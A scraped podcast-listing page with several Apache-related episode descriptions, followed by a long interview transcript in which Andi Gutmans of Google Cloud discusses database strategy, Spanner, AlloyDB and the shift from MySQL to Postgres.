Chris J. Davis, CTO of Ingredient X and Co-Founder of Film.io

Dinis Guarda citiesabc openbusinesscouncil Thought Leadership Interviews

Play Episode Listen Later Nov 10, 2023 68:04


Chris J. Davis is a technologist and entrepreneur, YouTuber, Designer, Technologist, Writer, Producer & Musician. Chris is the CTO and Co-Founder of Film.io, a decentralised entertainment ecosystem that is democratising the filmmaking and TV industries using DeFi and other blockchain technology. Film.io empowers fans with more influence in the creative process, creators with key access to resources, and investors with more meaningful data. He is also Co-Founder and CTO at Ingredient X, inc.Chris J. Davis Interview Questions00:00 – 04:02 Introduction04:03 – 09:12 Chris's Background, inspirations and motivations09:13 – 17:39 Working at the intersection of technology and art17:40 – 25:30 Managing between the creative, software development, and business roles25:31 – 37:59 Managing IP and digitalising film making38:00 – 50:48 A user's journey through Film.io50:49 – 01:05:13 How does Film.io build a sustainable community01:05:14 – 01:08:04 ClosureChris J. Davis BiographyChris J. Davis is a technologist and entrepreneur, YouTuber, Designer, Technologist, Writer, Producer & Musician. Chris is the CTO and Co-Founder of Film.io, a decentralised entertainment ecosystem that is democratising the filmmaking and TV industries using DeFi and other blockchain technology. Film.io empowers fans with more influence in the creative process, creators with key access to resources, and investors with more meaningful data. He is also Co-Founder and CTO at Ingredient X, inc.The platform transforms today's “Hollywood system” onto the blockchain, where fans, by participating before movies are made, have a voice in rating, reviewing and green-lighting the future of entertainment, developing an innovative metric that pre-validates the potential for a project's success for creators, studios, networks and investors with transparency and fairness.Chris is a versatile professional with over two decades of experience in design and engineering. Starting his academic journey in Art, Media Communications, and English at Asbury University, he later explored Music at the University of Louisville. A pioneer in the early days of WordPress, Chris made significant contributions to its development, creating the first admin dashboard and theme system. His innovations extended beyond WordPress, making him an active member of the Infrastructure team for the Apache Software Foundation. Chris has also played a vital role in various startups, collaborating with tech giants like Janus Friis. Currently serving as the Chief Technology Officer of Ingredient X, he focuses on cutting-edge technologies such as blockchain, decentralised finance, and non-fungible tokens.  Learn more about Chris J. Davis on https://www.openbusinesscouncil.org/wiki/chris-j-davisLearn more about Film.io on https://www.openbusinesscouncil.org/wiki/film-ioAbout Dinis Guarda profile and Channelshttps://www.openbusinesscouncil.orghttps://www.intelligenthq.comhttps://www.hedgethink.com/https://www.citiesabc.com/https://openbusinesscouncil.org/wiki/dinis-guardaMore interviews and research videos on Dinis GuardaSupport the show

Add Dot
Made for the Cloud: Cell-based Architecture, Ballerina Language, and Choreo Platform

Add Dot

Play Episode Listen Later Aug 28, 2023 70:30


Vaughn and Asanka—WSO2's CTO— discuss a relatively radical and fresh approach to cloud applications and services development. The tools include the domain-driven Cell-based Architecture, the Ballerina programming language, and the Choreo cloud platform. This purpose-built trio is composed as one powerful offering to give software engineers the ability to focus their efforts on delivering cloud-native applications and services. Of course, engineers are not required to use the Ballerina programming language. They may use Java and any other choice of language. Yet, those looking for a practical approach to functional programming that offers asynchronicity and handles service integrations well, Ballerina is a language worth trying. Together, this architecture-language-platform trio deserves consideration for use in your future enterprise.Asanka Abeysinghe, WSO2's CTO, is a technology visionary with over 20 years of experience designing and implementing scalable distributed systems, microservices, and business integration solutions. He advances WSO2's corporate reference architecture, collaborates with customers and industry analysts, and drives the company's technology mission. Asanka is also a contributor to the Apache Software Foundation and a sought-after speaker at global events. Hosted on Acast. See acast.com/privacy for more information.

Startup Project
#60 Tim Chen - From Open Source Contributor to Investor in Infrastructure Startups

Startup Project

Play Episode Listen Later Jul 2, 2023 63:42


Tim Chen is the Managing Partner at Essence VC, an early-stage fund focused on data infrastructure and developer tool companies. He has over a decade of experience leading engineering in enterprise infrastructure and open source communities and companies. Prior to Essence, Tim was the SVP of Engineering at Cosmos, a popular open source blockchain SDK. Prior to Cosmos, Tim co-founded Hyperpilot with Stanford Professor Christos Kozyrakis, leveraging decades of research to disrupt the enterprise infrastructure space, which later exited to Cloudera. Prior to Hyperpilot, Tim was an early employee at Mesosphere and CloudFoundry. He is also active in the open source space as an Apache Software Foundation core member, maintainer of Apache Drill and Apache Mesos, and CNCF TOC contributor. --- Send in a voice message: https://podcasters.spotify.com/pod/show/startupproject/message

To The Point - Cybersecurity
Keep People At The Center of it All with Mishi Choudhary Part 2

To The Point - Cybersecurity

Play Episode Listen Later Mar 14, 2023 34:25


Joining the podcast this week is Mishi Choudhary, SVP and General Counsel at Virtru. Mishi shares with us some legal perspective on the privacy discussion including freedom of thought, the right to be forgotten, end-to-end encryption for protecting user data, finding a middle ground between meeting customer privacy demands and complying with legal requirements, getting to a federal privacy regulation, and so much more! You won't want to miss what is a truly spirited and candid conversation – in two parts! Mishi Choudhary SVP and General Counsel, Virtru A technology lawyer with over 17 years of legal experience, Mishi has served as a legal representative for many of the world's most prominent free and open source software developers and distributors, including the Free Software Foundation, Cloud Native Computing Foundation, Linux Foundation, Debian, the Apache Software Foundation, and OpenSSL. At Virtru, she leads all legal and compliance activities, builds internal processes to continue to accelerate growth, helps shape Virtru and open source strategy, and activates global business development efforts. For links and resources discussed in this episode, please visit our show notes at https://www.forcepoint.com/govpodcast/e224

To The Point - Cybersecurity
Privacy: Keep People At The Center of it All with Mishi Choudhary

To The Point - Cybersecurity

Play Episode Listen Later Mar 7, 2023 23:37


Joining the podcast this week is Mishi Choudhary, SVP and General Counsel at Virtru. Mishi shares with us some legal perspective on the privacy discussion including freedom of thought, the right to be forgotten, end-to-end encryption for protecting user data, finding a middle ground between meeting customer privacy demands and complying with legal requirements, getting to a federal privacy regulation, and so much more! You won't want to miss what is a truly spirited and candid conversation – in two parts! Mishi Choudhary, SVP and General Counsel, Virtru A technology lawyer with over 17 years of legal experience, Mishi has served as a legal representative for many of the world's most prominent free and open source software developers and distributors, including the Free Software Foundation, Cloud Native Computing Foundation, Linux Foundation, Debian, the Apache Software Foundation, and OpenSSL. At Virtru, she leads all legal and compliance activities, builds internal processes to continue to accelerate growth, helps shape Virtru and open source strategy, and activates global business development efforts. For links and resources discussed in this episode, please visit our show notes at https://www.forcepoint.com/govpodcast/e223

Buongiorno da Edo
Nativi Americani contro Apache, e poi nuovi Intel Xeon, e poi State of JS 2022

Buongiorno da Edo

Play Episode Listen Later Jan 13, 2023 7:52


Indigenous tech group asks Apache Foundation to change its name - https://arstechnica.com/gadgets/2023/01/indigenous-tech-group-asks-apache-foundation-to-change-its-name/ Native Americans urge Apache Software Foundation to ditch its name - https://www.theregister.com/2023/01/11/native_american_apache_software_foundation/ Intel Launches 4th Gen Xeon Scalable "Sapphire Rapids", Xeon CPU Max Series - https://www.phoronix.com/review/intel-xeon-sapphire-rapids-max Intel Xeon Platinum 8490H "Sapphire Rapids" Performance Benchmarks - https://www.phoronix.com/review/intel-xeon-platinum-8490h After big delays, Sapphire Rapids arrives, full of accelerators and superlatives - https://www.theregister.com/2023/01/10/after_big_delays_intels_new/ Inside Intel's Delays in Delivering a Crucial New Microprocessor - https://www.nytimes.com/2023/01/10/technology/intel-sapphire-rapids-microprocessor.html The State of JS 2022 - https://2022.stateofjs.com/en-US/ #apache #nativeamericans #intel #xeon #sapphirerapids #stateofjs #stateofjs2022 === RSS - https://anchor.fm/s/b1bf48a0/podcast/rss --- Send in a voice message: https://podcasters.spotify.com/pod/show/edodusi/message

Der Data Analytics Podcast
Apache Software Foundation

Der Data Analytics Podcast

Play Episode Listen Later Dec 11, 2022 3:33


Was macht die Apache Software Foundation? Kurzer Überblick und Einordnung in die Data Engineering Infrastruktur.

Screaming in the Cloud
The Art and Science of Database Innovation with Andi Gutmans

Screaming in the Cloud

Play Episode Listen Later Nov 23, 2022 37:07


About AndiAndi Gutmans is the General Manager and Vice President for Databases at Google. Andi's focus is on building, managing and scaling the most innovative database services to deliver the industry's leading data platform for businesses. Before joining Google, Andi was VP Analytics at AWS running services such as Amazon Redshift. Before his tenure at AWS, Andi served as CEO and co-founder of Zend Technologies, the commercial backer of open-source PHP.Andi has over 20 years of experience as an open source contributor and leader. He co-authored open source PHP. He is an emeritus member of the Apache Software Foundation and served on the Eclipse Foundation's board of directors. He holds a bachelor's degree in Computer Science from the Technion, Israel Institute of Technology.Links Referenced: LinkedIn: https://www.linkedin.com/in/andigutmans/ Twitter: https://twitter.com/andigutmans TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: This episode is sponsored in part by our friends at Sysdig. Sysdig secures your cloud from source to run. They believe, as do I, that DevOps and security are inextricably linked. If you wanna learn more about how they view this, check out their blog, it's definitely worth the read. To learn more about how they are absolutely getting it right from where I sit, visit Sysdig.com and tell them that I sent you. That's S Y S D I G.com. And my thanks to them for their continued support of this ridiculous nonsense.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. This promoted episode is brought to us by our friends at Google Cloud, and in so doing, they have gotten a guest to appear on this show that I have been low-key trying to get here for a number of years. Andi Gutmans is VP and GM of Databases at Google Cloud. Andi, thank you for joining me.Andi: Corey, thanks so much for having me.Corey: I have to begin with the obvious. Given that one of my personal passion projects is misusing every cloud service I possibly can as a database, where do you start and where do you stop as far as saying, “Yes, that's a database,” so it rolls up to me and, “No, that's not a database, so someone else can deal with the nonsense?”Andi: I'm in charge of the operational databases, so that includes both the managed third-party databases such as MySQL, Postgres, SQL Server, and then also the cloud-first databases, such as Spanner, Big Table, Firestore, and AlloyDB. So, I suggest that's where you start because those are all awesome services. And then what doesn't fall underneath, kind of, that purview are things like BigQuery, which is an analytics, you know, data warehouse, and other analytics engines. And of course, there's always folks who bring in their favorite, maybe, lesser-known or less popular database and self-manage it on GCE, on Compute.Corey: Before you wound up at Google Cloud, you spent roughly four years at AWS as VP of Analytics, which is, again, one of those very hazy type of things. Where does it start? Where does it stop? It's not at all clear from the outside. But even before that, you were, I guess, something of a legendary figure, which I know is always a weird thing for people to hear.But you were partially at least responsible for the Zend Framework in the PHP world, which I didn't realize what the heck that was, despite supporting it in production at a couple of jobs, until after I, for better or worse, was no longer trusted to support production environments anymore. Which, honestly, if you can get out, I'm a big proponent of doing that. You sleep so much better without a pager. How did you go from programming languages all the way on over to databases? It just seems like a very odd mix.Andi: Yeah. No, that's a great question. So, I was one of the core developers of PHP, and you know, I had been in the PHP community for quite some time. I also helped ideate. The Zend Framework, which was the company that, you know, I co-founded Zend Technologies was kind of the company behind PHP.So, like Red Hat supports Linux commercially, we supported PHP. And I was very much focused on developers, programming languages, frameworks, IDEs, and that was, you know, really exciting. I had also done quite a bit of work on interoperability with databases, right, because behind every application, there's a database, and so a lot of what we focused on is a great connectivity to MySQL, to Postgres, to other databases, and I got to kind of learn the database world from the outside from the application builders. We sold our company in I think it was 2015 and so I had to kind of figure out what's next. And so, one option would have been, hey, stay in programming languages, but what I learned over the many years that I worked with application developers is that there's a huge amount of value in data.And frankly, I'm a very curious person; I always like to learn, so there was this opportunity to join Amazon, to join the non-relational database side, and take myself completely out of my comfort zone. And actually, I joined AWS to help build the graph database Amazon Neptune, which was even more out of my comfort zone than even probably a relational database. So, I kind of like to do different things and so I joined and I had to learn, you know how to build a database pretty much from the ground up. I mean, of course, I didn't do the coding, but I had to learn enough to be dangerous, and so I worked on a bunch of non-relational databases there such as, you know, Neptune, Redis, Elasticsearch, DynamoDB Accelerator. And then there was the opportunity for me to actually move over from non-relational databases to analytics, which was another way to get myself out of my comfort zone.And so, I moved to run the analytic space, which included services like Redshift, like EMR, Athena, you name it. So, that was just a great experience for me where I got to work with a lot of awesome people and learn a lot. And then the opportunity arose to join Google and actually run the Google transactional databases including their older relational databases. And by the way, my job actually have two jobs. One job is running Spanner and Big Table for Google itself—meaning, you know, search ads and YouTube and everything runs on these databases—and then the second job is actually running external-facing databases for external customers.Corey: How alike are those two? Is it effectively the exact same thing, just with different API endpoints? Are they two completely separate universes? It's always unclear from the outside when looking at large companies that effectively eat versions of their own dog food, where their internal usage of these things starts and stops.Andi: So, great question. So, Cloud Spanner and Cloud Big Table do actually use the internal Spanner and Big Table. So, at the core, it's exactly the same engine, the same runtime, same storage, and everything. However, you know, kind of, internally, the way we built the database APIs was kind of good for scrappy, you know, Google engineers, and you know, folks are kind of are okay, learning how to fit into the Google ecosystem, but when we needed to make this work for enterprise customers, we needed a cleaner APIs, we needed authentication that was an external, right, and so on, so forth. So, think about we had to add an additional set of APIs on top of it, and management, right, to really make these engines accessible to the external world.So, it's running the same engine under the hood, but it is a different set of APIs, and a big part of our focus is continuing to expose to enterprise customers all the goodness that we have on the internal system. So, it's really about taking these very, very unique differentiated databases and democratizing access to them to anyone who wants to.Corey: I'm curious to get your position on the idea that seems to be playing it's—I guess, a battle that's been playing itself out in a number of different customer conversations. And that is, I guess, the theoretical decision between, do we go towards general-purpose databases and more or less treat every problem as a nail in search of a hammer or do you decide that every workload gets its own custom database that aligns the best with that particular workload? There are trade-offs in either direction, but I'm curious where you land on that given that you tend to see a lot more of it than I do.Andi: No, that's a great question. And you know, just for the viewers who maybe aren't aware, there's kind of two extreme points of view, right? There's one point of view that says, purpose-built for everything, like, every specific pattern, like, build bespoke databases, it's kind of a best-of-breed approach. The problem with that approach is it becomes extremely complex for customers, right? Extremely complex to decide what to use, they might need to use multiple for the same application, and so that can be a bit daunting as a customer. And frankly, there's kind of a law of diminishing returns at some point.Corey: Absolutely. I don't know what the DBA role of the future is, but I don't think anyone really wants it to be, “Oh, yeah. We're deciding which one of these three dozen manage database services is the exact right fit for each and every individual workload.” I mean, at some point it feels like certain cloud providers believe that not only every workload should have its own database, but almost every workload should have its own database service. It's at some point, you're allowed to say no and stop building these completely, what feel like to me, Byzantine, esoteric database engines that don't seem to have broad applicability to a whole lot of problems.Andi: Exactly, exactly. And maybe the other extreme is what folks often talk about as multi-model where you say, like, “Hey, I'm going to have a single storage engine and then map onto that the relational model, the document model, the graph model, and so on.” I think what we tend to see is if you go too generic, you also start having performance issues, you may not be getting the right level of abilities and trade-offs around consistency, and replication, and so on. So, I would say Google, like, we're taking a very pragmatic approach where we're saying, “You know what? We're not going to solve all of customer problems with a single database, but we're also not going to have two dozen.” Right?So, we're basically saying, “Hey, let's understand that the main characteristics of the workloads that our customers need to address, build the best services around those.” You know, obviously, over time, we continue to enhance what we have to fit additional models. And then frankly, we have a really awesome partner ecosystem on Google Cloud where if someone really wants a very specialized database, you know, we also have great partners that they can use on Google Cloud and get great support and, you know, get the rest of the benefits of the platform.Corey: I'm very curious to get your take on a pattern that I've seen alluded to by basically every vendor out there except the couple of very obvious ones for whom it does not serve their particular vested interests, which is that there's a recurring narrative that customers are demanding open-source databases for their workloads. And when you hear that, at least, people who came up the way that I did, spending entirely too much time on Freenode, back when that was not a deeply problematic statement in and of itself, where, yes, we're open-source, I guess, zealots is probably the best terminology, and yeah, businesses are demanding to participate in the open-source ecosystem. Here in reality, what I see is not ideological purity or anything like that and much more to do with, “Yeah, we don't like having a single commercial vendor for our databases that basically plays the insert quarter to continue dance whenever we're trying to wind up doing something new. We want the ability to not have licensing constraints around when, where, how, and how quickly we can run databases.” That's what I hear when customers are actually talking about open-source versus proprietary databases. Is that what you see or do you think that plays out differently? Because let's be clear, you do have a number of database services that you offer that are not open-source, but are also absolutely not tied to weird licensing restrictions either?Andi: That's a great question, and I think for years now, customers have been in a difficult spot because the legacy proprietary database vendors, you know, knew how sticky the database is, and so as a result, you know, the prices often went up and was not easy for customers to kind of manage costs and agility and so on. But I would say that's always been somewhat of a concern. I think what I'm seeing changing and happening differently now is as customers are moving into the cloud and they want to run hybrid cloud, they want to run multi-cloud, they need to prove to their regulator that it can do a stressed exit, right, open-source is not just about reducing cost, it's really about flexibility and kind of being in control of when and where you can run the workloads. So, I think what we're really seeing now is a significant surge of customers who are trying to get off legacy proprietary database and really kind of move to open APIs, right, because they need that freedom. And that freedom is far more important to them than even the cost element.And what's really interesting is, you know, a lot of these are the decision-makers in these enterprises, not just the technical folks. Like, to your point, it's not just open-source advocates, right? It's really the business people who understand they need the flexibility. And by the way, even the regulators are asking them to show that they can flexibly move their workloads as they need to. So, we're seeing a huge interest there and, as you said, like, some of our services, you know, are open-source-based services, some of them are not.Like, take Spanner, as an example, it is heavily tied to how we build our infrastructure and how we build our systems. Like, I would say, it's almost impossible to open-source Spanner, but what we've done is we've basically embraced open APIs and made sure if a customer uses these systems, we're giving them control of when and where they want to run their workloads. So, for example, Big Table has an HBase API; Spanner now has a Postgres interface. So, our goal is really to give customers as much flexibility and also not lock them into Google Cloud. Like, we want them to be able to move out of Google Cloud so they have control of their destiny.Corey: I'm curious to know what you see happening in the real world because I can sit here and come up with a bunch of very well-thought-out logical reasons to go towards or away from certain patterns, but I spent years building things myself. I know how it works, you grab the closest thing handy and throw it in and we all know that there is nothing so permanent as a temporary fix. Like, that thing is load-bearing and you'll retire with that thing still in place. In the idealized world, I don't think that I would want to take a dependency on something like—easy example—Spanner or AlloyDB because despite the fact that they have Postgres-squeal—yes, that's how I pronounce it—compatibility, the capabilities of what they're able to do under the hood far exceed and outstrip whatever you're going to be able to build yourself or get anywhere else. So, there's a dataflow architectural dependency lock-in, despite the fact that it is at least on its face, Postgres compatible. Counterpoint, does that actually matter to customers in what you are seeing?Andi: I think it's a great question. I'll give you a couple of data points. I mean, first of all, even if you take a complete open-source product, right, running them in different clouds, different on-premises environments, and so on, fundamentally, you will have some differences in performance characteristics, availability characteristics, and so on. So, the truth is, even if you use open-source, right, you're not going to get a hundred percent of the same characteristics where you run that. But that said, you still have the freedom of movement, and with I would say and not a huge amount of engineering investment, right, you're going to make sure you can run that workload elsewhere.I kind of think of Spanner in the similar way where yes, I mean, you're going to get all those benefits of Spanner that you can't get anywhere else, like unlimited scale, global consistency, right, no maintenance downtime, five-nines availability, like, you can't really get that anywhere else. That said, not every application necessarily needs it. And you still have that option, right, that if you need to, or want to, or we're not giving you a reasonable price or reasonable price performance, but we're starting to neglect you as a customer—which of course we wouldn't, but let's just say hypothetically, that you know, that could happen—that you still had a way to basically go and run this elsewhere. Now, I'd also want to talk about some of the upsides something like Spanner gives you. Because you talked about, you want to be able to just grab a few things, build something quickly, and then, you know, you don't want to be stuck.The counterpoint to that is with Spanner, you can start really, really small, and then let's say you're a gaming studio, you know, you're building ten titles hoping that one of them is going to take off. So, you can build ten of those, you know, with very minimal spend on Spanner and if one takes off overnight, it's really only the database where you don't have to go and re-architect the application; it's going to scale as big as you need it to. And so, it does enable a lot of this innovation and a lot of cost management as you try to get to that overnight success.Corey: Yeah, overnight success. I always love that approach. It's one of those, “Yeah, I became an overnight success after only ten short years.” It becomes this idea people believe it's in fits and starts, but then you see, I guess, on some level, the other side of it where it's a lot of showing up and doing the work. I have to confess, I didn't do a whole lot of admin work in my production years that touched databases because I have an aura and I'm unlucky, and it turns out that when you blow away some web servers, everyone can laugh and we'll reprovision stateless things.Get too close to the data warehouse, for example, and you don't really have a company left anymore. And of course, in the world of finance that I came out of, transactional integrity is also very much a thing. A question that I had [centers 00:17:51] really around one of the predictions you gave recently at Google Cloud Next, which is your prediction for the future is that transactional and analytical workloads from a database perspective will converge. What's that based on?Andi: You know, I think we're really moving from a world where customers are trying to make real-time decisions, right? If there's model drift from an AI and ML perspective, want to be able to retrain their models as quickly as possible. So, everything is fast moving into streaming. And I think what you're starting to see is, you know, customers don't have that time to wait for analyzing their transactional data. Like in the past, you do a batch job, you know, once a day or once an hour, you know, move the data from your transactional system to analytical system, but that's just not how it is always-on businesses run anymore, and they want to have those real-time insights.So, I do think that what you're going to see is transactional systems more and more building analytical capabilities, analytical systems building, and more transactional, and then ultimately, cloud platform providers like us helping fill that gap and really making data movement seamless across transactional analytical, and even AI and ML workloads. And so, that's an area that I think is a big opportunity. I also think that Google is best positioned to solve that problem.Corey: Forget everything you know about SSH and try Tailscale. Imagine if you didn't need to manage PKI or rotate SSH keys every time someone leaves. That'd be pretty sweet, wouldn't it? With Tailscale SSH, you can do exactly that. Tailscale gives each server and user device a node key to connect to its VPN, and it uses the same node key to authorize and authenticate SSH.Basically you're SSHing the same way you manage access to your app. What's the benefit here? Built-in key rotation, permissions as code, connectivity between any two devices, reduce latency, and there's a lot more, but there's a time limit here. You can also ask users to reauthenticate for that extra bit of security. Sounds expensive?Nope, I wish it were. Tailscale is completely free for personal use on up to 20 devices. To learn more, visit snark.cloud/tailscale. Again, that's snark.cloud/tailscaleCorey: On some level, I've found that, at least in my own work, that once I wind up using a database for something, I'm inclined to try and stuff as many other things into that database as I possibly can just because getting a whole second data store, taking a dependency on it for any given workload tends to be a little bit on the, I guess, challenging side. Easy example of this. I've talked about it previously in various places, but I was talking to one of your colleagues, [Sarah Ellis 00:19:48], who wound up at one point making a joke that I, of course, took way too far. Long story short, I built a Twitter bot on top of Google Cloud Functions that every time the Azure brand account tweets, it simply quote-tweets that translates their tweet into all caps, and then puts a boomer-style statement in front of it if there's room. This account is @cloudboomer.Now, the hard part that I had while doing this is everything stateless works super well. Where do I wind up storing the ID of the last tweet that it saw on his previous run? And I was fourth and inches from just saying, “Well, I'm already using Twitter so why don't we use Twitter as a database?” Because everything's a database if you're either good enough or bad enough at programming. And instead, I decided, okay, we'll try this Firebase thing first.And I don't know if it's Firestore, or Datastore or whatever it's called these days, but once I wrap my head around it incredibly effective, very fast to get up and running, and I feel like I made at least a good decision, for once in my life, involving something touching databases. But it's hard. I feel like I'm consistently drawn toward the thing I'm already using as a default database. I can't shake the feeling that that's the wrong direction.Andi: I don't think it's necessarily wrong. I mean, I think, you know, with Firebase and Firestore, that combination is just extremely easy and quick to build awesome mobile applications. And actually, you can build mobile applications without a middle tier which is probably what attracted you to that. So, we just see, you know, huge amount of developers and applications. We have over 4 million databases in Firestore with just developers building these applications, especially mobile-first applications. So, I think, you know, if you can get your job done and get it done effectively, absolutely stick to them.And by the way, one thing a lot of people don't know about Firestore is it's actually running on Spanner infrastructure, so Firestore has the same five-nines availability, no maintenance downtime, and so on, that has Spanner, and the same kind of ability to scale. So, it's not just that it's quick, it will actually scale as much as you need it to and be as available as you need it to. So, that's on that piece. I think, though, to the same point, you know, there's other databases that we're then trying to make sure kind of also extend their usage beyond what they've traditionally done. So, you know, for example, we announced AlloyDB, which I kind of call it Postgres on steroids, we added analytical capabilities to this transactional database so that as customers do have more data in their transactional database, as opposed to having to go somewhere else to analyze it, they can actually do real-time analytics within that same database and it can actually do up to 100 times faster analytics than open-source Postgres.So, I would say both Firestore and AlloyDB, are kind of good examples of if it works for you, right, we'll also continue to make investments so the amount of use cases you can use these databases for continues to expand over time.Corey: One of the weird things that I noticed just looking around this entire ecosystem of databases—and you've been in this space long enough to, presumably, have seen the same type of evolution—back when I was transiting between different companies a fair bit, sometimes because I was consulting and other times because I'm one of the greatest in the world at getting myself fired from jobs based upon my personality, I found that the default standard was always, “Oh, whatever the database is going to be, it started off as MySQL and then eventually pivots into something else when that starts falling down.” These days, I can't shake the feeling that almost everywhere I look, Postgres is the answer instead. What changed? What did I miss in the ecosystem that's driving that renaissance, for lack of a better term?Andi: That's a great question. And, you know, I have been involved in—I'm going to date myself a bit—but in PHP since 1997, pretty much, and one of the things we kind of did is we build a really good connector to MySQL—and you know, I don't know if you remember, before MySQL, there was MS SQL. So, the MySQL API actually came from MS SQL—and we bundled the MySQL driver with PHP. And so, kind of that LAMP stack really took off. And kind of to your point, you know, the default in the web, right, was like, you're going to start with MySQL because it was super easy to use, just fun to use.By the way, I actually wrote—co-authored—the tab completion in the MySQL client. So like, a lot of these kinds of, you know, fun, simple ways of using MySQL were there, and frankly, was super fast, right? And so, kind of those fast reads and everything, it just was great for web and for content. And at the time, Postgres kind of came across more like a science project. Like the folks who were using Postgres were kind of the outliers, right, you know, the less pragmatic folks.I think, what's changed over the past, how many years has it been now, 25 years—I'm definitely dating myself—is a few things: one, MySQL is still awesome, but it didn't kind of go in the direction of really, kind of, trying to catch up with the legacy proprietary databases on features and functions. Part of that may just be that from a roadmap perspective, that's not where the owner wanted it to go. So, MySQL today is still great, but it didn't go into that direction. In parallel, right, customers wanting to move more to open-source. And so, what they found this, the thing that actually looks and smells more like legacy proprietary databases is actually Postgres, plus you saw an increase of investment in the Postgres ecosystem, also very liberal license.So, you have lots of other databases including commercial ones that have been built off the Postgres core. And so, I think you are today in a place where, for mainstream enterprise, Postgres is it because that is the thing that has all the features that the enterprise customer is used to. MySQL is still very popular, especially in, like, content and web, and mobile applications, but I would say that Postgres has really become kind of that de facto standard API that's replacing the legacy proprietary databases.Corey: I've been on the record way too much as saying, with some justification, that the best database in the world that should be used for everything is Route 53, specifically, TXT records. It's a key-value store and then anyone who's deep enough into DNS or databases generally gets a slightly greenish tinge and feels ill. That is my simultaneous best and worst database. I'm curious as to what your most controversial opinion is about the worst database in the world that you've ever seen.Andi: This is the worst database? Or—Corey: Yeah. What is the worst database that you've ever seen? I know, at some level, since you manage all things database, I'm asking you to pick your least favorite child, but here we are.Andi: Oh, that's a really good question. No, I would say probably the, “Worst database,” double-quotes is just the file system, right? When folks are basically using the file system as regular database. And that can work for, you know, really simple apps, but as apps get more complicated, that's not going to work. So, I've definitely seen some of that.I would say the most awesome database that is also file system-based kind of embedded, I think was actually SQLite, you know? And SQLite is actually still very, very popular. I think it sits on every mobile device pretty much on the planet. So, I actually think it's awesome, but it's, you know, it's on a database server. It's kind of an embedded database, but it's something that I, you know, I've always been pretty excited about. And, you know, their stuff [unintelligible 00:27:43] kind of new, interesting databases emerging that are also embedded, like DuckDB is quite interesting. You know, it's kind of the SQLite for analytics.Corey: We've been using it for a few things around a bill analysis ourselves. It's impressive. I've also got to say, people think that we had something to do with it because we're The Duckbill Group, and it's DuckDB. “Have you done anything with this?” And the answer is always, “Would you trust me with a database? I didn't think so.” So no, it's just a weird coincidence. But I liked that a lot.It's also counterintuitive from where I sit because I'm old enough to remember when Microsoft was teasing the idea of WinFS where they teased a future file system that fundamentally was a database—I believe it's an index or journal for all of that—and I don't believe anything ever came of it. But ugh, that felt like a really weird alternate world we could have lived in.Andi: Yeah. Well, that's a good point. And by the way, you know, if I actually take a step back, right, and I kind of half-jokingly said, you know, file system and obviously, you know, all the popular databases persist on the file system. But if you look at what's different in cloud-first databases, right, like, if you look at legacy proprietary databases, the typical setup is wright to the local disk and then do asynchronous replication with some kind of bounded replication lag to somewhere else, to a different region, or so on. If you actually start to look at what the cloud-first databases look like, they actually write the data in multiple data centers at the same time.And so, kind of joke aside, as you start to think about, “Hey, how do I build the next generation of applications and how do I really make sure I get the resiliency and the durability that the cloud can offer,” it really does take a new architecture. And so, that's where things like, you know, Spanner and Big Table, and kind of, AlloyDB databases are truly architected for the cloud. That's where they actually think very differently about durability and replication, and what it really takes to provide the highest level of availability and durability.Corey: On some level, I think one of the key things for me to realize was that in my own experiments, whenever I wind up doing something that is either for fun or I just want see how it works in what's possible, the scale of what I'm building is always inherently a toy problem. It's like the old line that if it fits in RAM, you don't have a big data problem. And then I'm looking at things these days that are having most of a petabyte's worth of RAM sometimes it's okay, that definition continues to extend and get ridiculous. But I still find that most of what I do in a database context can be done with almost any database. There's no reason for me not to, for example, uses a SQLite file or to use an object store—just there's a little latency, but whatever—or even a text file on disk.The challenge I find is that as you start scaling and growing these things, you start to run into limitations left and right, and only then it's one of those, oh, I should have made different choices or I should have built-in abstractions. But so many of these things comes to nothing; it just feels like extra work. What guidance do you have for people who are trying to figure out how much effort to put in upfront when they're just more or less puttering around to see what comes out of it?Andi: You know, we like to think about ourselves at Google Cloud as really having a unique value proposition that really helps you future-proof your development. You know, if I look at both Spanner and I look at BigQuery, you can actually start with a very, very low cost. And frankly, not every application has to scale. So, you can start at low cost, you can have a small application, but everyone wants two things: one is availability because you don't want your application to be down, and number two is if you have to scale you want to be able to without having to rewrite your application. And so, I think this is where we have a very unique value proposition, both in how we built Spanner and then also how we build BigQuery is that you can actually start small, and for example, on Spanner, you can go from one-tenth of what we call an instance, like, a small instance, that is, you know, under $65 a month, you can go to a petabyte scale OLTP environment with thousands of instances in Spanner, with zero downtime.And so, I think that is really the unique value proposition. We're basically saying you can hold the stick at both ends: you can basically start small and then if that application doesn't need to scale, does need to grow, you're not reengineering your application and you're not taking any downtime for reprovisioning. So, I think that's—if I had to give folks, kind of, advice, I say, “Look, what's done is done. You have workloads on MySQL, Postgres, and so on. That's great.”Like, they're awesome databases, keep on using them. But if you're truly building a new app, and you're hoping that app is going to be successful at some point, whether it's, like you said, all overnight successes take at least ten years, at least you built in on something like Spanner, you don't actually have to think about that anymore or worry about it, right? It will scale when you need it to scale and you're not going to have to take any downtime for it to scale. So, that's how we see a lot of these industries that have these potential spikes, like gaming, retail, also some use cases in financial services, they basically gravitate towards these databases.Corey: I really want to thank you for taking so much time out of your day to talk with me about databases and your perspective on them, especially given my profound level of ignorance around so many of them. If people want to learn more about how you view these things, where's the best place to find you?Andi: Follow me on LinkedIn. I tend to post quite a bit on LinkedIn, I still post a bit on Twitter, but frankly, I've moved more of my activity to LinkedIn now. I find it's—Corey: That is such a good decision. I envy you.Andi: It's a more curated [laugh], you know, audience and so on. And then also, you know, we just had Google Cloud Next. I recorded a session there that kind of talks about database and just some of the things that are new in database-land at Google Cloud. So, that's another thing that if folks more interested to get more information, that may be something that could be appealing to you.Corey: We will, of course, put links to all of this in the [show notes 00:34:03]. Thank you so much for your time. I really appreciate it.Andi: Great. Corey, thanks so much for having me.Corey: Andi Gutmans, VP and GM of Databases at Google Cloud. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry, insulting comment, then I'm going to collect all of those angry, insulting comments and use them as a database.Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less 